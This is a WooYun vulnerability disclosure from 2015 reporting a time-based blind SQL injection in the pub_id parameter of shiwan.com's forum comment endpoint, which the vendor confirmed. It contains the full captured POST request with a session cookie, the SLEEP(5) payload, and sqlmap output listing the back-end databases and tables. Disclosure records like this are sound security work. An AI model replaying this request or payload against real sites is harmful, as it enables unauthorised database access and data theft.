当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108668

漏洞标题:试玩网某处POST时间盲注

相关厂商:shiwan.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-04-20 09:33

修复时间:2015-06-04 12:18

公开时间:2015-06-04 12:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-20: 细节已通知厂商并且等待厂商处理中
2015-04-20: 厂商已经确认,细节仅向厂商公开
2015-04-30: 细节向核心白帽子及相关领域专家公开
2015-05-10: 细节向普通白帽子公开
2015-05-20: 细节向实习白帽子公开
2015-06-04: 细节向公众公开

简要描述:

我就那么随便一测试···哥 那几个漏洞还确认不?···

详细说明:

POST内容 将post内容保存为1.txt

POST /bin/comment_create.php HTTP/1.1
Host: bbs.shiwan.com
Proxy-Connection: keep-alive
Content-Length: 145
Accept: */*
Origin: http://bbs.shiwan.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 UBrowser/4.1.4627.19 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://bbs.shiwan.com/subject/177225
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=8kcf0e0st90qs2j3ojvib75tp1; Hm_lvt_b62f4400b835e82ee066d6d620606917=1429240474; Hm_lpvt_b62f4400b835e82ee066d6d620606917=1429240474; qqmail_alias=admin@shiwan.com; pgv_pvi=9918721024; pgv_si=s9459251200; current_uid=3179139; current_user_score=5; jiathis_rdc=%7B%22http%3A//bbs.shiwan.com/subject/52756%22%3A-970578339%2C%22http%3A//bbs.shiwan.com/subject/54264%22%3A-970571628%2C%22http%3A//bbs.shiwan.com/subject/186741%3F1429253894%22%3A-970234094%2C%22http%3A//bbs.shiwan.com/subject/186741%22%3A-970114428%2C%22http%3A//bbs.shiwan.com/subject/186782%22%3A-970079946%2C%22http%3A//bbs.shiwan.com/subject/115515%3F1429254745%22%3A-969704491%2C%22http%3A//bbs.shiwan.com/subject/115515%22%3A-968983514%2C%22http%3A//bbs.shiwan.com/subject/188910%22%3A-961967162%2C%22http%3A//bbs.shiwan.com/subject/75440%22%3A-961294766%2C%22http%3A//bbs.shiwan.com/subject/181846%22%3A-958908883%2C%22http%3A//bbs.shiwan.com/subject/142965%22%3A-958867674%2C%22http%3A//bbs.shiwan.com/subject/175227%22%3A-958824546%2C%22http%3A//bbs.shiwan.com/subject/186638%22%3A-958800740%2C%22http%3A//bbs.shiwan.com/subject/177545%22%3A0%7C1429265334319%2C%22http%3A//bbs.shiwan.com/subject/177225%22%3A%220%7C1429265412291%22%7D; Hm_lvt_9e00488eabf8fd23e9f79e6cffd51708=1429265188,1429265229,1429265329,1429265408; Hm_lpvt_9e00488eabf8fd23e9f79e6cffd51708=1429265450
pub_id=42&comment=023&subject_id=177225&comment_cookie_name=3179139_comment&comment_current_time=1429265891&picture_insert_src=&video_insert_src


然后sqlmap 注入

1.png


sqlmap identified the following injection points with a total of 1461 HTTP(s) re
quests:
---
Place: POST
Parameter: pub_id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: pub_id=42 AND SLEEP(5)&comment=023&subject_id=177225&comment_cookie
_name=3179139_comment&comment_current_time=1429265891&picture_insert_src=&video_
insert_src=
---
[18:25:11] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
[18:25:11] [INFO] fetching database names
[18:25:11] [INFO] fetching number of databases
[18:25:11] [INFO] retrieved:


2.png

漏洞证明:

时间注入太慢了 点到为止吧 时间紧迫 懒得再去弄 反正有时间 跑数据库什么的 不是问题···

[18:25:53] [INFO] adjusting time delay to 2 seconds due to good response times
9
[18:25:54] [INFO] retrieved: information_schema
[18:31:07] [INFO] retrieved: comment
[18:33:16] [INFO] retrieved: ismp
[18:34:39] [INFO] retrieved: mysql
[18:36:08] [INFO] retrieved: notification
[18:39:41] [INFO] retrieved: performance_schema
[18:44:47] [INFO] retrieved: publish
[18:47:00] [INFO] retrieved: qa
[18:47:24] [INFO] retrieved: shiwan
[18:49:11] [INFO] fetching tables for databases: 'comment, information_schema,
smp, mysql, notification, performance_schema, publish, qa, shiwan'
[18:49:11] [INFO] fetching number of tables for database 'comment'
[18:49:11] [INFO] retrieved: 118
[18:49:35] [INFO] retrieved: activity
[18:51:49] [INFO] retrieved: comment_ext
[18:55:21] [INFO] retrieved: comment_long_0
[18:58:03] [INFO] retrieved: comment_long_1
[18:59:10] [INFO] retrieved: comment_long_2
[19:00:20] [INFO] retrieved:

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-04-20 12:16

厂商回复:

非常感谢您提供的漏洞,我们会尽快处理,谢谢!
希望后续继续关注我们,提交漏洞。感谢。

最新状态:

暂无

漏洞评价:

评论